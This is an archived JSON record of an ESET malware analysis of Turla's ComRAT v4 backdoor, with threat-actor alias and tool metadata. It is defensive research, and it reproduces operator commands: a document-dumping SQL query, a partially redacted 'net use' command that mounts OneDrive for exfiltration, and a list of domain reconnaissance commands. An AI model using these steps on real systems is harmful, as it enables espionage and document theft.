{
	"id": "650d3276-1d93-4f24-94db-30e709b12e44",
	"created_at": "2026-04-06T00:19:04.368904Z",
	"updated_at": "2026-04-10T03:33:36.043467Z",
	"deleted_at": null,
	"sha1_hash": "e858aa0773d6c6cb14878ec9f5e360f24c124c80",
	"title": "From Agent.BTZ to ComRAT v4: A ten-year journey",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 134434,
	"plain_text": "From Agent.BTZ to ComRAT v4: A ten-year journey\r\nBy Matthieu Faou\r\nArchived: 2026-04-05 18:54:11 UTC\r\nESET researchers have found a new version of one of the oldest malware families run by the Turla group, ComRAT.\r\nTurla, also known as Snake, is an infamous espionage group that has been active for more than ten years. We have\r\npreviously described many campaigns attributed to this group.\r\nComRAT, also known as Agent.BTZ and to its developers as Chinch, is a Remote Access Trojan (RAT) that became\r\ninfamous after its use in a breach of the US military in 2008. The first version of this malware, likely released in\r\n2007, exhibited worm capabilities by spreading through removable drives. From 2007 to 2012, two new major\r\nversions of the RAT were released. Interestingly, both employed the well-known Turla XOR key:\r\n1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s\r\nUntil mid-2017, the Turla developers made a few changes to ComRAT, but these variants were apparently still\r\nderived from the same code base.\r\nThen, in 2017, we noticed that a very different version of ComRAT had been released. This new version used a\r\ncompletely new code base and was far more complex than its predecessors. Here are the main characteristics of this\r\nmalware family:\r\nComRAT v4 was first seen in 2017 and known still to be in use as recently as January 2020.\r\nWe identified at least three targets: two Ministries of Foreign Affairs and a national parliament.\r\nComRAT was used to exfiltrate sensitive documents. 
The operators used public cloud services such as\r\nOneDrive and 4shared to exfiltrate data.\r\nComRAT is a complex backdoor developed in C++.\r\nComRAT uses a Virtual FAT16 File System.\r\nComRAT is deployed using existing access methods, such as the PowerStallion PowerShell backdoor.\r\nComRAT has two Command and Control channels\r\nHTTP: It uses exactly the same protocol as ComRAT v3\r\nEmail: It uses the Gmail web interface to receive commands and exfiltrate data\r\nComRAT can perform many actions on the compromised computers, such as executing additional programs or\r\nexfiltrating files.\r\nAttribution to Turla\r\nBased on the victimology and the TTPs, we believe that ComRAT is used exclusively by Turla. There are a few\r\nelements linking ComRAT v4 to Turla:\r\nIt uses the same internal name, Chinch, as the previous versions\r\nIt uses the same custom C\u0026C protocol over HTTP as ComRAT v3\r\nA part of the network infrastructure is shared with another Turla malware family, Mosquito\r\nhttps://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/\r\nPage 1 of 7\n\nIt was dropped by, or has dropped other, Turla malware families:\r\nA customized PowerShell loader\r\nThe PowerStallion backdoor\r\nThe RPC backdoor\r\nInsight into attacker’s activity\r\nDuring our investigation, we were able to gain insights about what Turla operators were doing on the compromised\r\nmachines.\r\nThe main use of ComRAT is stealing confidential documents. 
In one case, its operators even deployed a .NET\r\nexecutable to interact with the victim’s central MS SQL Server database containing the organization’s documents.\r\nFigure 1 is the redacted SQL command.\r\nsqlCommand.CommandText = \"select top \" + num2.ToString() + \" filename, img, datalength(img), id from \u003cRedacted\u003e wi\r\nsqlCommand.CommandText += \" and datalength(img)\u003c1500000 and (filename like '%.doc' or filename like '%.docx' or fil\r\nsqlCommand.CommandText += \" order by id\";\r\nFigure 1. SQL command to dump documents from the central database (partially redacted)\r\nThese documents were then compressed and exfiltrated to a cloud storage provider such as OneDrive or 4shared.\r\nCloud storage is mounted using the net use command as shown in Figure 2.\r\ntracert -h 10 yahoo.com\r\nnet use https://docs.live.net/E65\u003credacted\u003e \u003credacted password\u003e /u:\u003credacted\u003e@aol.co.uk\r\ntracert -h 10 yahoo.com\r\nFigure 2. Command to mount a OneDrive folder using net use (partially redacted)\r\nIn addition to document stealing, the operators also run many commands to gather information about the Active\r\nDirectory groups or users, the network, or Microsoft Windows configurations such as the group policies. 
Figure 3 is a\r\nlist of commands executed by Turla operators.\r\ngpresult /z\r\ngpresult /v\r\ngpresult\r\nnet view\r\nnet view /domain\r\nnetstat\r\nnetstat -nab\r\nnetstat -nao\r\nnslookup 127.0.0.1\r\nipconfig /all\r\narp -a\r\nnet share\r\nnet use\r\nsysteminfo\r\nnet user\r\nnet user administrator\r\nnet user /domain\r\nnet group\r\nnet group /domain\r\nnet localgroup\r\nnet localgroup\r\nnet localgroup Administrators\r\nnet group \"Domain Computers\" /domain\r\nnet group \"Domain Admins\" /domain\r\nnet group \"Domain Controllers\" /domain\r\ndir \"%programfiles%\"\r\nnet group \"Exchange Servers\" /domain\r\nnet accounts\r\nnet accounts /domain\r\nnet view 127.0.0.1 /all\r\nnet session\r\nroute print\r\nipconfig /displaydns\r\nFigure 3. Basic recon of the compromised machine\r\nFinally, we also noticed that Turla operators are aware of and try to evade security software. For instance, they\r\nregularly exfiltrate security-related log files in order to understand whether their malware samples have been\r\ndetected. This shows the level of sophistication of this group and its intention to stay on the same machines for a long\r\ntime.\r\nTechnical analysis\r\nAccording to its compilation timestamp, which is likely genuine, the first known sample of ComRAT v4 was\r\ncompiled in April 2017. The most recent iteration of the backdoor we’ve seen was, to the best of our knowledge,\r\ncompiled in November 2019.\r\nBased on ESET telemetry, we believe that ComRAT is installed using an existing foothold such as compromised\r\ncredentials or via another Turla backdoor. 
For instance, we've seen ComRAT installed by PowerStallion, their\r\nPowerShell-based backdoor we described in 2019.\r\nThe ComRAT installer is a PowerShell script that creates a Windows scheduled task and fills a Registry value with\r\nthe encrypted payload.\r\nComRAT v4 has several components:\r\nan orchestrator, injected into explorer.exe. It controls most of ComRAT functions including the execution of\r\nbackdoor commands.\r\na communication module (a DLL), injected into the default browser by the orchestrator. It communicates with\r\nthe orchestrator using a named pipe.\r\na Virtual FAT16 File System, containing the configuration and the logs files.\r\nFigure 4 is an overview of ComRAT’s architecture.\r\nFigure 4. Summary of ComRAT architecture\r\nComRAT v4 has two different C\u0026C channels: HTTP (known internally as legacy), which (surprise surprise) uses the\r\nHTTP protocol, and email (known internally as mail), which uses the Gmail web interface.\r\nIn the latter mode and using cookies stored in the configuration, it connects to the Gmail web interface in order to\r\ncheck the inbox and download specific mail attachments that contain encrypted commands. These commands are sent\r\nby the malware operators from another address, generally hosted on a different free email provider such as GMX.\r\nA detailed technical analysis of all ComRAT’s components is available in the white paper.\r\nConclusion\r\nComRAT v4 is a totally revamped malware family released in 2017. Its developers took inspiration from other Turla\r\nbackdoors, such as Snake, to build a very complex piece of malware.\r\nIts most interesting feature is the use of the Gmail web UI to receive commands and exfiltrate data. 
Thus, it is able to\r\nbypass some security controls because it doesn’t rely on any malicious domain. We also noticed that this new version\r\nabandoned the use of COM object hijacking for persistence, the method that gave the malware its common name.\r\nWe found indications that ComRAT v4 was still in use at the beginning of 2020, showing that the Turla group is still\r\nvery active and a major threat for diplomats and militaries.\r\nA full and comprehensive list of Indicators of Compromise (IoCs) and samples can be found in the full white paper\r\nand in our GitHub repository.\r\nFor a detailed analysis of the backdoor, refer to our white paper. For any inquiries, or to make sample submissions\r\nrelated to the subject, contact us at threatintel@eset.com.\r\nMITRE ATT\u0026CK techniques\r\nTactic | Id | Name | Description\r\nExecution | T1086 | PowerShell | A PowerShell script is used to install ComRAT.\r\nPersistence | T1053 | Scheduled Task | ComRAT uses a scheduled task to launch its PowerShell loader.\r\nDefense Evasion | T1027 | Obfuscated Files or Information | The ComRAT orchestrator is stored encrypted and only decrypted upon execution.\r\nDefense Evasion | T1055 | Process Injection | The ComRAT orchestrator is injected into explorer.exe. The communication DLL is injected into the default browser.\r\nDefense Evasion | T1112 | Modify Registry | The ComRAT orchestrator is stored encrypted in the Registry.\r\nDiscovery | T1016 | System Network Configuration Discovery | Operators execute ipconfig and nbstat.\r\nDiscovery | T1033 | System Owner/User Discovery | Operators execute net user.\r\nDiscovery | T1069 | Permission Groups Discovery | Operators execute net group /domain.\r\nDiscovery | T1082 | System Information Discovery | Operators execute systeminfo.\r\nDiscovery | T1083 | File and Directory Discovery | Operators list the content of several directories. Example: dir /og-d \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*.*\".\r\nDiscovery | T1087 | Account Discovery | Operators execute net user and net group.\r\nDiscovery | T1120 | Peripheral Device Discovery | Operators execute fsutil fsinfo drives to list the connected drives.\r\nDiscovery | T1135 | Network Share Discovery | Operators execute net view.\r\nCollection | T1213 | Data from Information Repositories | The operators use a custom tool to exfiltrate documents from an internal central database.\r\nCommand and Control | T1024 | Custom Cryptographic Protocol | ComRAT uses RSA and AES to encrypt C\u0026C data.\r\nCommand and Control | T1043 | Commonly Used Port | ComRAT uses ports 80 and 443.\r\nCommand and Control | T1071 | Standard Application Layer Protocol | ComRAT uses HTTP and HTTPS.\r\nCommand and Control | T1102 | Web Service | ComRAT can be controlled via the Gmail web UI.\r\nExfiltration | T1002 | Data Compressed | The documents are compressed in a RAR archive.\r\nExfiltration | T1022 | Data Encrypted | The RAR archive is encrypted with a password.\r\nExfiltration | T1048 | Exfiltration Over Alternative Protocol | Data is exfiltrated to cloud storage, mounted locally using the net use command.\r\nSource: https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/"
	],
	"report_names": [
		"agentbtz-comratv4-ten-year-journey"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434744,
	"ts_updated_at": 1775792016,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e858aa0773d6c6cb14878ec9f5e360f24c124c80.pdf",
		"text": "https://archive.orkl.eu/e858aa0773d6c6cb14878ec9f5e360f24c124c80.txt",
		"img": "https://archive.orkl.eu/e858aa0773d6c6cb14878ec9f5e360f24c124c80.jpg"
	}
}